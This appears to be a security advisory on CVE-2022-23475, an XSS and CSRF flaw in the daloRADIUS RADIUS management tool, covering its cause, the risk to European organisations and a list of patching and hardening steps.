CVE-2022-23475 is a security vulnerability affecting daloRADIUS, an open-source web management application for RADIUS servers, specifically versions 1.3 and earlier. The vulnerability is a combination of Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) issues located in the mng-del.php file. The root cause is an unescaped variable reflected directly in the Document Object Model (DOM) at line 116, which allows an attacker to inject malicious scripts. This XSS flaw can be exploited to execute arbitrary JavaScript in the context of an authenticated user's browser session. Coupled with the CSRF vulnerability, which allows unauthorized commands to be transmitted from a user that the web application trusts, this can lead to account takeover scenarios. The CSRF issue arises because the application does not implement anti-CSRF tokens in forms and does not restrict session cookies with the SameSite attribute. The vulnerability has been addressed in a specific commit (ec3b4a419e), which users are advised to apply manually if they cannot upgrade. Mitigation strategies include setting the session cookie to SameSite=Lax or implementing CSRF tokens in all forms to prevent unauthorized requests. For the XSS component, escaping user input properly or enforcing a strict Content Security Policy (CSP) can prevent script injection. No known exploits are reported in the wild, but the combination of XSS and CSRF leading to account takeover represents a significant risk if left unpatched.

For European organizations using daloRADIUS for RADIUS server management, this vulnerability poses a moderate to high risk. Successful exploitation can lead to account takeover, potentially allowing attackers to manipulate authentication and authorization mechanisms, disrupt network access control, or exfiltrate sensitive user credentials. This can compromise network security infrastructure, leading to broader impacts such as unauthorized network access, data breaches, or service disruptions. Given that RADIUS servers are critical components in enterprise network authentication, especially in sectors like telecommunications, finance, and government, exploitation could undermine trust and operational continuity. The combined XSS and CSRF vulnerabilities increase the attack surface by enabling attackers to bypass typical security controls through social engineering or malicious links. The absence of known exploits suggests limited current active threat but does not diminish the potential impact if exploited. Organizations with exposed or externally accessible daloRADIUS management interfaces are at higher risk. The vulnerability's exploitation requires user interaction (e.g., clicking a malicious link), which may limit automated mass exploitation but remains a significant threat in targeted attacks.

1. Apply the official patch or manually apply the commit ec3b4a419e to fix the vulnerability at the source code level. 2. Configure the daloRADIUS session cookie with the SameSite=Lax attribute to mitigate CSRF attacks by restricting cookie transmission in cross-site requests. 3. Implement anti-CSRF tokens in all forms to ensure that requests originate from legitimate users and sessions. 4. Sanitize and escape all user-supplied input reflected in the DOM to prevent XSS injection. 5. Deploy a strict Content Security Policy (CSP) that restricts the execution of inline scripts and limits sources of executable scripts to trusted domains. 6. Restrict access to the daloRADIUS management interface by IP whitelisting or VPN access to reduce exposure. 7. Conduct regular security audits and penetration testing focusing on web application vulnerabilities. 8. Educate users about phishing and social engineering risks to reduce the likelihood of successful exploitation via malicious links. 9. Monitor web server logs for suspicious requests targeting mng-del.php or unusual POST requests that may indicate exploitation attempts.